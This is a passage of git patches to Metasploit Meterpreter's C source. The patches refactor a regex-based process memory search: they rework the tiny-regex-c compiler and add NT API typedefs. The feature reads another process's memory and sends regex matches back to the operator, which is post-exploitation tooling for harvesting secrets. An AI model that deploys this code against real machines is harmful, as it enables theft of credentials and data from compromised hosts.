Search complete."); if (buffer != NULL) { dprintf("[MEM SEARCH] Freeing process memory buffer."); free(buffer); } - if (process_handle != NULL) { dprintf("[MEM SEARCH] Closing process handle."); CloseHandle(process_handle); } + if (process_handle != NULL) { dprintf("[MEM SEARCH] Closing process handle."); fCloseHandle(process_handle); } dprintf("[MEM SEARCH] Cleaning up needles"); for (size_t i = 0; i < needle_enum_index; i++) { - if (regex_needles[i] != NULL) - { - if (regex_needles[i]->raw_needle_buffer != NULL) - { - dprintf("[MEM SEARCH] Freeing needle buffer"); - free(regex_needles[i]->raw_needle_buffer); - } - - dprintf("[MEM SEARCH] Freeing regex needle."); - free(regex_needles[i]); - } + const NTSTATUS cleanup_result = cleanup_needle(®ex_needles[i]); + if (cleanup_result == ERROR_INVALID_PARAMETER) { dprintf("[MEM SEARCH] Could not clean up needle"); } } dprintf("[MEM SEARCH] Transmitting response"); diff --git a/c/meterpreter/source/tiny-regex-c/re.c b/c/meterpreter/source/tiny-regex-c/re.c index 0568bb994..b5fd887c3 100644 --- a/c/meterpreter/source/tiny-regex-c/re.c +++ b/c/meterpreter/source/tiny-regex-c/re.c @@ -34,11 +34,7 @@ /* Definitions: */ -#define MAX_REGEXP_OBJECTS 256 /* Max number of regex symbols in expression. */ -#define MAX_CHAR_CLASS_LEN 256 /* Max length of character-class buffer in. */ - - -enum { UNUSED, DOT, BEGIN, END, QUESTIONMARK, STAR, PLUS, CHAR, CHAR_CLASS, INV_CHAR_CLASS, DIGIT, NOT_DIGIT, ALPHA, NOT_ALPHA, WHITESPACE, NOT_WHITESPACE, /* BRANCH */ }; +enum { UNUSED, DOT, BEGIN, END, QUESTIONMARK, STAR, PLUS, CHAR_RE, CHAR_CLASS, INV_CHAR_CLASS, DIGIT, NOT_DIGIT, ALPHA, NOT_ALPHA, WHITESPACE, NOT_WHITESPACE, /* BRANCH */ }; /* Private function declarations: */ static int matchpattern(regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t* matchlength); @@ -54,14 +50,7 @@ static int matchrange(char c, const char* str); static int matchdot(char c); static int ismetachar(char c); - - /* Public functions: */ -int re_match(const char* pattern, size_t pattern_length, const char* text, size_t text_length, size_t* matchlength) -{ - return re_matchp(re_compile(pattern, pattern_length), text, text_length, matchlength); -} - int re_matchp(re_t pattern, const char* text, size_t text_length, size_t* matchlength) { *matchlength = 0; @@ -89,146 +78,135 @@ int re_matchp(re_t pattern, const char* text, size_t text_length, size_t* matchl return -1; } -re_t re_compile(const char* pattern, size_t pattern_length) +int re_compile(const char* pattern, size_t pattern_length, size_t max_regex_objects, size_t max_char_class_len, re_t* out_compiled, unsigned char** out_ccl) { - /* The sizes of the two static arrays below substantiates the static RAM usage of this module. - MAX_REGEXP_OBJECTS is the max number of symbols in the expression. - MAX_CHAR_CLASS_LEN determines the size of buffer for chars in all char-classes in the expression. */ - static regex_t re_compiled[MAX_REGEXP_OBJECTS]; - static unsigned char ccl_buf[MAX_CHAR_CLASS_LEN]; - int ccl_bufidx = 1; - - char c; /* current char in pattern */ - int i = 0; /* index into pattern */ - int j = 0; /* index into re_compiled */ - - while (i < (int)pattern_length && (j+1 < MAX_REGEXP_OBJECTS)) - { - c = pattern[i]; + if (out_compiled == NULL || out_ccl == NULL) { return 1; } - switch (c) - { - /* Meta-characters: */ - case '^': { re_compiled[j].type = BEGIN; } break; - case '$': { re_compiled[j].type = END; } break; - case '.': { re_compiled[j].type = DOT; } break; - case '*': { re_compiled[j].type = STAR; } break; - case '+': { re_compiled[j].type = PLUS; } break; - case '?': { re_compiled[j].type = QUESTIONMARK; } break; -/* case '|': { re_compiled[j].type = BRANCH; } break; <-- not working properly */ - - /* Escaped character-classes (\s \w ...): */ - case '\\': - { - if (i + 1 < (int)pattern_length) - { - /* Skip the escape-char '\\' */ - i += 1; - /* ... and check the next */ - switch (pattern[i]) - { - /* Meta-character: */ - case 'd': { re_compiled[j].type = DIGIT; } break; - case 'D': { re_compiled[j].type = NOT_DIGIT; } break; - case 'w': { re_compiled[j].type = ALPHA; } break; - case 'W': { re_compiled[j].type = NOT_ALPHA; } break; - case 's': { re_compiled[j].type = WHITESPACE; } break; - case 'S': { re_compiled[j].type = NOT_WHITESPACE; } break; - - /* Escaped character, e.g. '.' or '$' */ - default: - { - re_compiled[j].type = CHAR; - re_compiled[j].u.ch = pattern[i]; - } break; - } - } - /* '\\' as last char in pattern -> invalid regular expression. */ -/* - else - { - re_compiled[j].type = CHAR; - re_compiled[j].ch = pattern[i]; - } -*/ - } break; + int ccl_bufidx = 1; - /* Character class: */ - case '[': - { - /* Remember where the char-buffer starts. */ - int buf_begin = ccl_bufidx; + char c; /* current char in pattern */ + int i = 0; /* index into pattern */ + int j = 0; /* index into re_compiled */ + + while (i < (int)pattern_length && (j + 1 < MAX_REGEXP_OBJECTS)) + { + c = pattern[i]; - /* Look-ahead to determine if negated */ - if (pattern[i+1] == '^') + switch (c) { - re_compiled[j].type = INV_CHAR_CLASS; - i += 1; /* Increment i to avoid including '^' in the char-buffer */ - if (pattern[i+1] == 0) /* incomplete pattern, missing non-zero char after '^' */ - { - return 0; - } - } - else + /* Meta-characters: */ + case '^': { (*out_compiled)[j].type = BEGIN; } break; + case '$': { (*out_compiled)[j].type = END; } break; + case '.': { (*out_compiled)[j].type = DOT; } break; + case '*': { (*out_compiled)[j].type = STAR; } break; + case '+': { (*out_compiled)[j].type = PLUS; } break; + case '?': { (*out_compiled)[j].type = QUESTIONMARK; } break; + /* case '|': { re_compiled[j].type = BRANCH; } break; <-- not working properly */ + + /* Escaped character-classes (\s \w ...): */ + case '\\': { - re_compiled[j].type = CHAR_CLASS; - } + if (i + 1 < (int)pattern_length) + { + /* Skip the escape-char '\\' */ + i += 1; + /* ... and check the next */ + switch (pattern[i]) + { + /* Meta-character: */ + case 'd': { (*out_compiled)[j].type = DIGIT; } break; + case 'D': { (*out_compiled)[j].type = NOT_DIGIT; } break; + case 'w': { (*out_compiled)[j].type = ALPHA; } break; + case 'W': { (*out_compiled)[j].type = NOT_ALPHA; } break; + case 's': { (*out_compiled)[j].type = WHITESPACE; } break; + case 'S': { (*out_compiled)[j].type = NOT_WHITESPACE; } break; + + /* Escaped character, e.g. '.' or '$' */ + default: + { + (*out_compiled)[j].type = CHAR_RE; + (*out_compiled)[j].u.ch = pattern[i]; + } break; + } + } + else + { + (*out_compiled)[j].type = CHAR_RE; + (*out_compiled)[j].u.ch = pattern[i]; + } + } break; - /* Copy characters inside [..] to buffer */ - while ( (pattern[++i] != ']') - && (pattern[i] != '\0')) /* Missing ] */ + /* Character class: */ + case '[': { - if (pattern[i] == '\\') - { - if (ccl_bufidx >= MAX_CHAR_CLASS_LEN - 1) + /* Remember where the char-buffer starts. */ + int buf_begin = ccl_bufidx; + + /* Look-ahead to determine if negated */ + if (pattern[i + 1] == '^') { - //fputs("exceeded internal buffer!\n", stderr); - return 0; + (*out_compiled)[j].type = INV_CHAR_CLASS; + i += 1; /* Increment i to avoid including '^' in the char-buffer */ + if (i + 1 == (int)pattern_length) /* incomplete pattern, missing non-zero char after '^' */ + { + return 1; + } } - if (pattern[i+1] == 0) /* incomplete pattern, missing non-zero char after '\\' */ + else { - return 0; + (*out_compiled)[j].type = CHAR_CLASS; } - ccl_buf[ccl_bufidx++] = pattern[i++]; - } - else if (ccl_bufidx >= MAX_CHAR_CLASS_LEN) - { - //fputs("exceeded internal buffer!\n", stderr); - return 0; - } - ccl_buf[ccl_bufidx++] = pattern[i]; - } - if (ccl_bufidx >= MAX_CHAR_CLASS_LEN) + + /* Copy characters inside [..] to buffer */ + while ((pattern[++i] != ']') + && (i < (int)pattern_length)) /* Missing ] */ + { + if (pattern[i] == '\\') + { + if (ccl_bufidx >= MAX_CHAR_CLASS_LEN - 1) + { + //fputs("exceeded internal buffer!\n", stderr); + return 1; + } + if (i + 1 == (int)pattern_length) /* incomplete pattern, missing non-zero char after '\\' */ + { + return 1; + } + (*out_ccl)[ccl_bufidx++] = pattern[i++]; + } + else if (ccl_bufidx >= MAX_CHAR_CLASS_LEN) + { + //fputs("exceeded internal buffer!\n", stderr); + return 1; + } + (*out_ccl)[ccl_bufidx++] = pattern[i]; + } + if (ccl_bufidx >= MAX_CHAR_CLASS_LEN) + { + /* Catches cases such as [00000000000000000000000000000000000000][ */ + //fputs("exceeded internal buffer!\n", stderr); + return 1; + } + /* Null-terminate string end */ + (*out_ccl)[ccl_bufidx++] = 0; + (*out_compiled)[j].u.ccl = &(*out_ccl)[buf_begin]; + } break; + + /* Other characters: */ + default: { - /* Catches cases such as [00000000000000000000000000000000000000][ */ - //fputs("exceeded internal buffer!\n", stderr); - return 0; + (*out_compiled)[j].type = CHAR_RE; + (*out_compiled)[j].u.ch = c; + } break; } - /* Null-terminate string end */ - ccl_buf[ccl_bufidx++] = 0; - re_compiled[j].u.ccl = &ccl_buf[buf_begin]; - } break; - /* Other characters: */ - default: - { - re_compiled[j].type = CHAR; - re_compiled[j].u.ch = c; - } break; + i += 1; + j += 1; } - /* no buffer-out-of-bounds access on invalid patterns - see https://github.com/kokke/tiny-regex-c/commit/1a279e04014b70b0695fba559a7c05d55e6ee90b */ - if (pattern[i] == 0) - { - return 0; - } - - i += 1; - j += 1; - } - /* 'UNUSED' is a sentinel used to indicate end-of-pattern */ - re_compiled[j].type = UNUSED; + /* 'UNUSED' is a sentinel used to indicate end-of-pattern */ + (*out_compiled)[j].type = UNUSED; - return (re_t) re_compiled; + return 0; // ERROR_SUCCESS } void re_print(regex_t* pattern) @@ -260,7 +238,7 @@ void re_print(regex_t* pattern) } printf("]"); } - else if (pattern[i].type == CHAR) + else if (pattern[i].type == CHAR_RE) { printf(" '%c'", pattern[i].u.ch); } diff --git a/c/meterpreter/source/tiny-regex-c/re.h b/c/meterpreter/source/tiny-regex-c/re.h index bd084cccb..45b8cdf11 100644 --- a/c/meterpreter/source/tiny-regex-c/re.h +++ b/c/meterpreter/source/tiny-regex-c/re.h @@ -55,18 +55,14 @@ typedef struct regex_t /* Typedef'd pointer to get abstract datatype. */ typedef struct regex_t* re_t; - -/* Compile regex string pattern to a regex_t-array. */ -re_t re_compile(const char* pattern, size_t pattern_length); - +#define MAX_REGEXP_OBJECTS 255 /* Max number of regex symbols in expression. */ +#define MAX_CHAR_CLASS_LEN 255 /* Max length of character-class buffer in. */ /* Find matches of the compiled pattern inside text. */ int re_matchp(re_t pattern, const char* text, size_t text_length, size_t* matchlength); - -/* Find matches of the txt pattern inside text (will compile automatically first). */ -int re_match(const char* pattern, size_t pattern_length, const char* text, size_t text_length, size_t* matchlength); - +/* Compile a regular expression in-place, allowing for multiple needles to be compiled without the usage of a static buffer. Returns ERROR_SUCCESS (0) on success, else 1. */ +int re_compile(const char* pattern, size_t pattern_length, size_t max_regex_objects, size_t max_char_class_len, re_t* out_compiled, unsigned char** out_ccl); #ifdef __cplusplus } From 8f51ee7e6d21182f202287769da4ba04484bab05 Mon Sep 17 00:00:00 2001 From: sjanusz-r7 Date: Fri, 8 Dec 2023 18:32:47 +0000 Subject: [PATCH 03/14] Move defs to top of file, remove pointer-to-pointer, make RegexNeedle contain static-size arrays --- .../stdapi/server/sys/process/memory.c | 342 +++++++----------- c/meterpreter/source/tiny-regex-c/re.c | 66 ++-- c/meterpreter/source/tiny-regex-c/re.h | 2 +- 3 files changed, 155 insertions(+), 255 deletions(-) diff --git a/c/meterpreter/source/extensions/stdapi/server/sys/process/memory.c b/c/meterpreter/source/extensions/stdapi/server/sys/process/memory.c index 4d2eef43a..e592dd4ce 100644 --- a/c/meterpreter/source/extensions/stdapi/server/sys/process/memory.c +++ b/c/meterpreter/source/extensions/stdapi/server/sys/process/memory.c @@ -2,6 +2,89 @@ #include "common_metapi.h" #include "../tiny-regex-c/re.h" +#ifndef __kernel_entry +#define __kernel_entry +#endif + +typedef __kernel_entry NTSTATUS(WINAPI* NTQUERYINFORMATIONPROCESS) (HANDLE ProcessHandle, DWORD ProcessInformationClass, LPVOID ProcessInformation, ULONG ProcessInformationLength, PULONG ReturnLength); + +typedef SIZE_T(WINAPI* VIRTUALQUERYEX) (HANDLE hProcess, LPCVOID lpAddress, PMEMORY_BASIC_INFORMATION lpBuffer, SIZE_T dwLength); + +typedef BOOL(WINAPI* CLOSEHANDLE) (HANDLE hObject); + +typedef HANDLE(WINAPI* OPENPROCESS) (DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwProcessId); + +typedef FARPROC(WINAPI* GETPROCADDRESS) (HMODULE hModule, LPCSTR lpProcName); + +// http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FMemory%20Management%2FVirtual%20Memory%2FNtReadVirtualMemory.html +// https://ntdoc.m417z.com/ntreadvirtualmemory +typedef NTSTATUS(NTAPI* NTREADVIRTUALMEMORY) (HANDLE ProcessHandle, LPCVOID BaseAddress, LPVOID Buffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead); + +// http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FMemory%20Management%2FVirtual%20Memory%2FMEMORY_INFORMATION_CLASS.html +typedef enum _MEMORY_INFORMATION_CLASS { + MemoryBasicInformation +} MEMORY_INFORMATION_CLASS, * PMEMORY_INFORMATION_CLASS; + +typedef struct _UNICODE_STRING { + USHORT Length; + USHORT MaximumLength; + PWSTR Buffer; +} UNICODE_STRING; +typedef UNICODE_STRING* PUNICODE_STRING; +typedef const UNICODE_STRING* PCUNICODE_STRING; + +// https://learn.microsoft.com/en-us/windows/win32/api/ntdef/ns-ntdef-_object_attributes +typedef struct _OBJECT_ATTRIBUTES { + ULONG Length; + HANDLE RootDirectory; + PUNICODE_STRING ObjectName; + ULONG Attributes; + PVOID SecurityDescriptor; + PVOID SecurityQualityOfService; +} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES; + +typedef struct _RTL_USER_PROCESS_PARAMETERS { + BYTE Reserved1[16]; + PVOID Reserved2[10]; + UNICODE_STRING ImagePathName; + UNICODE_STRING CommandLine; +} RTL_USER_PROCESS_PARAMETERS, * PRTL_USER_PROCESS_PARAMETERS; + +typedef +VOID +(NTAPI* PPS_POST_PROCESS_INIT_ROUTINE) ( + VOID + ); + +typedef struct _PEB { + BYTE Reserved1[2]; + BYTE BeingDebugged; + BYTE Reserved2[1]; + PVOID Reserved3[2]; + PPEB_LDR_DATA Ldr; + PRTL_USER_PROCESS_PARAMETERS ProcessParameters; + BYTE Reserved4[104]; + PVOID Reserved5[52]; + PPS_POST_PROCESS_INIT_ROUTINE PostProcessInitRoutine; + BYTE Reserved6[128]; + PVOID Reserved7[1]; + ULONG SessionId; +} PEB, * PPEB; + +typedef struct _PROCESS_BASIC_INFORMATION { + PVOID Reserved1; + PPEB PebBaseAddress; + PVOID Reserved2[2]; + ULONG_PTR UniqueProcessId; + PVOID Reserved3; +} PROCESS_BASIC_INFORMATION; +typedef PROCESS_BASIC_INFORMATION* PPROCESS_BASIC_INFORMATION; + +typedef enum _PROCESSINFOCLASS { + ProcessBasicInformation = 0, + ProcessWow64Information = 26 +} PROCESSINFOCLASS; + /*! * @brief Allocates memory in the context of the supplied process. * @remark The @@ -341,89 +424,6 @@ DWORD request_sys_process_memory_unlock(Remote *remote, Packet *packet) return ERROR_SUCCESS; } -#ifndef __kernel_entry - #define __kernel_entry -#endif - -typedef __kernel_entry NTSTATUS(WINAPI* NTQUERYINFORMATIONPROCESS) (HANDLE ProcessHandle, DWORD ProcessInformationClass, LPVOID ProcessInformation, ULONG ProcessInformationLength, PULONG ReturnLength); - -typedef SIZE_T(WINAPI* VIRTUALQUERYEX) (HANDLE hProcess, LPCVOID lpAddress, PMEMORY_BASIC_INFORMATION lpBuffer, SIZE_T dwLength); - -typedef BOOL(WINAPI* CLOSEHANDLE) (HANDLE hObject); - -typedef HANDLE(WINAPI* OPENPROCESS) (DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwProcessId); - -typedef FARPROC(WINAPI* GETPROCADDRESS) (HMODULE hModule, LPCSTR lpProcName); - -// http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FMemory%20Management%2FVirtual%20Memory%2FNtReadVirtualMemory.html -// https://ntdoc.m417z.com/ntreadvirtualmemory -typedef NTSTATUS(NTAPI* NTREADVIRTUALMEMORY) (HANDLE ProcessHandle, LPCVOID BaseAddress, LPVOID Buffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead); - -// http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FMemory%20Management%2FVirtual%20Memory%2FMEMORY_INFORMATION_CLASS.html -typedef enum _MEMORY_INFORMATION_CLASS { - MemoryBasicInformation -} MEMORY_INFORMATION_CLASS, * PMEMORY_INFORMATION_CLASS; - -typedef struct _UNICODE_STRING { - USHORT Length; - USHORT MaximumLength; - PWSTR Buffer; -} UNICODE_STRING; -typedef UNICODE_STRING* PUNICODE_STRING; -typedef const UNICODE_STRING* PCUNICODE_STRING; - -// https://learn.microsoft.com/en-us/windows/win32/api/ntdef/ns-ntdef-_object_attributes -typedef struct _OBJECT_ATTRIBUTES { - ULONG Length; - HANDLE RootDirectory; - PUNICODE_STRING ObjectName; - ULONG Attributes; - PVOID SecurityDescriptor; - PVOID SecurityQualityOfService; -} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES; - -typedef struct _RTL_USER_PROCESS_PARAMETERS { - BYTE Reserved1[16]; - PVOID Reserved2[10]; - UNICODE_STRING ImagePathName; - UNICODE_STRING CommandLine; -} RTL_USER_PROCESS_PARAMETERS, * PRTL_USER_PROCESS_PARAMETERS; - -typedef -VOID -(NTAPI* PPS_POST_PROCESS_INIT_ROUTINE) ( - VOID - ); - -typedef struct _PEB { - BYTE Reserved1[2]; - BYTE BeingDebugged; - BYTE Reserved2[1]; - PVOID Reserved3[2]; - PPEB_LDR_DATA Ldr; - PRTL_USER_PROCESS_PARAMETERS ProcessParameters; - BYTE Reserved4[104]; - PVOID Reserved5[52]; - PPS_POST_PROCESS_INIT_ROUTINE PostProcessInitRoutine; - BYTE Reserved6[128]; - PVOID Reserved7[1]; - ULONG SessionId; -} PEB, * PPEB; - -typedef struct _PROCESS_BASIC_INFORMATION { - PVOID Reserved1; - PPEB PebBaseAddress; - PVOID Reserved2[2]; - ULONG_PTR UniqueProcessId; - PVOID Reserved3; -} PROCESS_BASIC_INFORMATION; -typedef PROCESS_BASIC_INFORMATION* PPROCESS_BASIC_INFORMATION; - -typedef enum _PROCESSINFOCLASS { - ProcessBasicInformation = 0, - ProcessWow64Information = 26 -} PROCESSINFOCLASS; - BOOL can_read_memory(DWORD memory_protect) { const int page_execute_read = 0x20; @@ -437,14 +437,10 @@ BOOL can_read_memory(DWORD memory_protect) memory_protect == page_readwrite; } -// In order to be able to regex null-butes, we need to store the length explicitly, so that null-bytes aren't being treated as the end of a string. -struct regex_needle -{ - char* raw_needle_buffer; - size_t length; - regex_t* compiled_needle; - unsigned char* char_buf; -}; +typedef struct { + re_t compiled_regex[MAX_REGEXP_OBJECTS]; + unsigned char buffer[MAX_CHAR_CLASS_LEN]; // Used for character strings when "[]" is used. +} RegexNeedle; #define NEEDLES_MAX (size_t)5 #define MEMORY_BUFFER_SIZE (size_t)(64 * 1024 * 1024) @@ -452,116 +448,25 @@ struct regex_needle /// /// Add the needle results to a packet. This automatically inserts each result into a new group. Returns ERROR_SUCCESS on success, or 1 on failure. /// -/// The packet to insert the needle goup into +/// The packet to insert the needle group into /// ERROR_SUCCESS on success, else non-zero -NTSTATUS add_needle_results_to_packet(Packet** out, const char* memory_buffer_ptr, size_t match_length, size_t match_address, size_t memory_base_address, size_t memory_region_size) +NTSTATUS add_needle_results_to_packet(Packet* packet, const unsigned char* memory_buffer_ptr, size_t match_length, size_t match_address, size_t memory_base_address, size_t memory_region_size) { - if (out == NULL || memory_buffer_ptr == NULL) { return ERROR_INVALID_PARAMETER; } + if (packet == NULL || memory_buffer_ptr == NULL) { return ERROR_INVALID_PARAMETER; } dprintf("[MEM SEARCH] Creating results group"); - Packet* search_results = met_api->packet.create_group(); if (search_results == NULL) { dprintf("[MEM SEARCH] Could not create search result group"); return ERROR_OUTOFMEMORY; } dprintf("[MEM SEARCH] Adding results to packet group"); - - dprintf("[MEM SEARCH] Adding Match bytes"); // Note: This raw data needs to be read from the buffer we copied. Trying to read it from mem.BaseAddress directly will make us crash. met_api->packet.add_tlv_raw(search_results, TLV_TYPE_MEMORY_SEARCH_MATCH_STR, (LPVOID)memory_buffer_ptr, (DWORD)match_length + 1); - - dprintf("[MEM SEARCH] Adding Match address"); met_api->packet.add_tlv_qword(search_results, TLV_TYPE_MEMORY_SEARCH_MATCH_ADDR, match_address); - - dprintf("[MEM SEARCH] Adding Region base address"); met_api->packet.add_tlv_qword(search_results, TLV_TYPE_MEMORY_SEARCH_START_ADDR, memory_base_address); - - dprintf("[MEM SEARCH] Adding Region size"); met_api->packet.add_tlv_qword(search_results, TLV_TYPE_MEMORY_SEARCH_SECT_LEN, memory_region_size); - - dprintf("[MEM SEARCH] Adding Match Length"); met_api->packet.add_tlv_uint(search_results, TLV_TYPE_MEMORY_SEARCH_MATCH_LEN, (UINT)match_length); - dprintf("[MEM SEARCH] Adding Group"); - met_api->packet.add_group(*out, TLV_TYPE_MEMORY_SEARCH_RESULTS, search_results); - - return ERROR_SUCCESS; -} - -/// -/// Compile a regular expression in-place. -/// -/// A pointer to a regular expression needle struct. -/// ERROR_SUCCESS on success, ERROR_INVALID_PARAMETER when provided with a null pointer or the regular expression failed to compile -NTSTATUS re_compile_inplace(struct regex_needle** in_out) -{ - if (in_out == NULL) { return ERROR_INVALID_PARAMETER; } - const int compile_result = re_compile((*in_out)->raw_needle_buffer, (*in_out)->length, MAX_REGEXP_OBJECTS, MAX_CHAR_CLASS_LEN, &(*in_out)->compiled_needle, &(*in_out)->char_buf); - if (compile_result != ERROR_SUCCESS) { return ERROR_INVALID_PARAMETER; } - - return ERROR_SUCCESS; -} - -/// -/// Sets up a regular expression needle from a TLV. -/// -/// - Pointer to the needle TLV received from the server containing the needle buffer -/// - The compiled needle -/// ERROR_SUCCESS on success, non-zero on failure -NTSTATUS setup_needle_from_tlv(const Tlv* needle_buffer_tlv, struct regex_needle** out) -{ - // The header contains a null-terminator which we do not need. - dprintf("[MEM SEARCH] Getting needle length"); - const size_t needle_length = needle_buffer_tlv->header.length - 1; - if (needle_length == 0) { dprintf("[MEM SEARCH] Got a needle length of 0"); return ERROR_INVALID_PARAMETER; } - - (*out)->length = needle_length; - dprintf("[MEM SEARCH] Allocating memory for needle buffer"); - (*out)->raw_needle_buffer = (char*)malloc(needle_length * sizeof(char)); - if ((*out)->raw_needle_buffer == NULL) { dprintf("[MEM SEARCH] Could not allocate memory for raw needle buffer"); return ERROR_OUTOFMEMORY; } - - dprintf("[MEM SEARCH] Copying TLV buffer to needle"); - memcpy((*out)->raw_needle_buffer, (char*)needle_buffer_tlv->buffer, needle_length); - - dprintf("[MEM SEARCH] Allocating memory for a compiled needle"); - (*out)->compiled_needle = (regex_t*)malloc(MAX_REGEXP_OBJECTS * sizeof(struct regex_t)); - if ((*out)->compiled_needle == NULL) { dprintf("[MEM SEARCH] Unable to malloc memory for a compiled needle"); return ERROR_OUTOFMEMORY; } - - dprintf("[MEM SEARCH] Allocating memory for a char buffer"); - (*out)->char_buf = (unsigned char*)malloc(MAX_CHAR_CLASS_LEN * sizeof(unsigned char)); - if ((*out)->char_buf == NULL) { dprintf("[MEM SEARCH] Unable to malloc memory for a char buffer"); return ERROR_OUTOFMEMORY; } - - dprintf("[MEM SEARCH] Compiling needle: %.*s", needle_length, (char*)needle_buffer_tlv->buffer); - const NTSTATUS compile_result = re_compile_inplace(&(*out)); - if (compile_result != ERROR_SUCCESS) - { dprintf("[MEM SEARCH] Failed to compile needle"); return ERROR_INVALID_PARAMETER; } - - return ERROR_SUCCESS; -} - -NTSTATUS cleanup_needle(struct regex_needle** in) -{ - if (in == NULL || *in == NULL) { return ERROR_INVALID_PARAMETER; } - - if ((*in)->raw_needle_buffer != NULL) - { - dprintf("[MEM SEARCH] Freeing needle buffer"); - free((*in)->raw_needle_buffer); - } - - if ((*in)->char_buf != NULL) - { - dprintf("[MEM SEARCH] Freeing char buf"); - free((*in)->char_buf); - } - - if ((*in)->compiled_needle != NULL) - { - dprintf("[MEM SEARCH] Freeing compiled needle"); - free((*in)->compiled_needle); - } - - dprintf("[MEM SEARCH] Freeing regex needle."); - free((*in)); + met_api->packet.add_group(packet, TLV_TYPE_MEMORY_SEARCH_RESULTS, search_results); return ERROR_SUCCESS; } @@ -575,7 +480,7 @@ static CLOSEHANDLE fCloseHandle = NULL; static VIRTUALQUERYEX fVirtualQueryEx = NULL; static NTREADVIRTUALMEMORY fNtReadVirtualMemory = NULL; -BOOL setup_handles() +NTSTATUS setup_handles() { if ((hKernel32 = GetModuleHandleA("kernel32.dll")) == NULL) { dprintf("[MEM SEARCH] Could not get kernel32.dll handle"); return ERROR_INVALID_HANDLE; } @@ -606,29 +511,24 @@ DWORD request_sys_process_memory_search(Remote* remote, Packet* packet) { Packet* response = met_api->packet.create_response(packet); DWORD result = ERROR_SUCCESS; - char* buffer = NULL; + unsigned char* memory_buffer = NULL; size_t needle_enum_index = 0; HANDLE process_handle = NULL; - struct regex_needle* regex_needles[NEEDLES_MAX]; + RegexNeedle regex_needles[NEEDLES_MAX] = { NULL }; dprintf("[MEM SEARCH] Getting PID"); const DWORD pid = met_api->packet.get_tlv_value_uint(packet, TLV_TYPE_PID); if (pid == 0) { result = ERROR_INVALID_PARAMETER; goto done; } dprintf("[MEM SEARCH] Searching PID: %lu", pid); - Tlv needle_buffer_tlv = { 0 }; - while (needle_enum_index < NEEDLES_MAX && met_api->packet.enum_tlv(packet, (DWORD)needle_enum_index, TLV_TYPE_MEMORY_SEARCH_NEEDLE, &needle_buffer_tlv) == ERROR_SUCCESS) + Tlv needle_tlv = { 0 }; + while (needle_enum_index < NEEDLES_MAX && met_api->packet.enum_tlv(packet, (DWORD)needle_enum_index, TLV_TYPE_MEMORY_SEARCH_NEEDLE, &needle_tlv) == ERROR_SUCCESS) { - dprintf("[MEM SEARCH] Allocating %u bytes of memory for regex needle", sizeof(struct regex_needle)); - regex_needles[needle_enum_index] = (struct regex_needle*)malloc(sizeof(struct regex_needle)); - if (regex_needles[needle_enum_index] == NULL) { dprintf("[MEM SEARCH] Could not allocate memory for regex needle"); result = ERROR_OUTOFMEMORY; goto done; } - - dprintf("[MEM SEARCH] Setting up needle from TLV"); - const NTSTATUS needle_setup_result = setup_needle_from_tlv(&needle_buffer_tlv, ®ex_needles[needle_enum_index]); - if (needle_setup_result != ERROR_SUCCESS) + dprintf("[MEM SEARCH] Compiling needle regex from TLV"); + const int result = re_compile(needle_tlv.buffer, needle_tlv.header.length - 1, (re_t)®ex_needles[needle_enum_index].compiled_regex, (unsigned char*)®ex_needles[needle_enum_index].buffer); + if (result != ERROR_SUCCESS) { - dprintf("[MEM SEARCH] Failed to setup needle from TLV packet"); - result = needle_setup_result; + dprintf("[MEM SEARCH] Failed to setup compile needle regex from TLV packet"); goto done; } @@ -642,8 +542,11 @@ DWORD request_sys_process_memory_search(Remote* remote, Packet* packet) const size_t current_max_match_length = max_match_length; dprintf("[MEM SEARCH] Getting handles & proc addresses"); - const NTSTATUS setup_handles_result = setup_handles(); - if (setup_handles_result != ERROR_SUCCESS) { dprintf("[MEM SEARCH] Could not set up all necessary handles & proc addresses"); result = setup_handles_result; goto done; } + if ((result = setup_handles()) != ERROR_SUCCESS) + { + dprintf("[MEM SEARCH] Could not set up all necessary handles & proc addresses"); + goto done; + } const DWORD process_vm_read = 0x0010; const DWORD process_query_information = 0x0400; @@ -655,8 +558,8 @@ DWORD request_sys_process_memory_search(Remote* remote, Packet* packet) MEMORY_BASIC_INFORMATION mem = { 0 }; dprintf("[MEM SEARCH] Allocating buffer for storing process memory"); - buffer = (char*)malloc(MEMORY_BUFFER_SIZE); - if (buffer == NULL) { dprintf("[MEM SEARCH] Could not allocate memory buffer"); result = ERROR_OUTOFMEMORY; goto done; } + memory_buffer = (unsigned char*)malloc(MEMORY_BUFFER_SIZE * sizeof(unsigned char)); + if (memory_buffer == NULL) { dprintf("[MEM SEARCH] Could not allocate memory buffer"); result = ERROR_OUTOFMEMORY; goto done; } for (size_t current_ptr = 0; fVirtualQueryEx(process_handle, (LPCVOID)current_ptr, &mem, sizeof(mem)); current_ptr += mem.RegionSize) { @@ -670,15 +573,19 @@ DWORD request_sys_process_memory_search(Remote* remote, Packet* packet) while (mem.RegionSize > memory_region_offset) { const size_t leftover_bytes = mem.RegionSize - memory_region_offset; - const size_t bytes_to_read = min(leftover_bytes, MEMORY_BUFFER_SIZE); + const size_t bytes_to_read = min(leftover_bytes, MEMORY_BUFFER_SIZE * sizeof(unsigned char)); dprintf("[MEM SEARCH] Leftover Bytes count: %llu", leftover_bytes); dprintf("[MEM SEARCH] Bytes to read: %llu", bytes_to_read); size_t bytes_read = 0; const size_t read_address = (size_t)mem.BaseAddress + memory_region_offset; // Note: This will read up to a maximum of bytes_to_read OR to the end of the memory region if the end of it has been reached. - const NTSTATUS read_virtual_memory_status = fNtReadVirtualMemory(process_handle, (LPCVOID)read_address, buffer, bytes_to_read, &bytes_read); - if (read_virtual_memory_status != ERROR_SUCCESS) { dprintf("[MEM SEARCH] Failed to read some virtual memory for process, skipping %u bytes", bytes_to_read); memory_region_offset += bytes_to_read; continue; } + if (fNtReadVirtualMemory(process_handle, (LPCVOID)read_address, memory_buffer, bytes_to_read, &bytes_read) != ERROR_SUCCESS) + { + dprintf("[MEM SEARCH] Failed to read some virtual memory for process, skipping %u bytes", 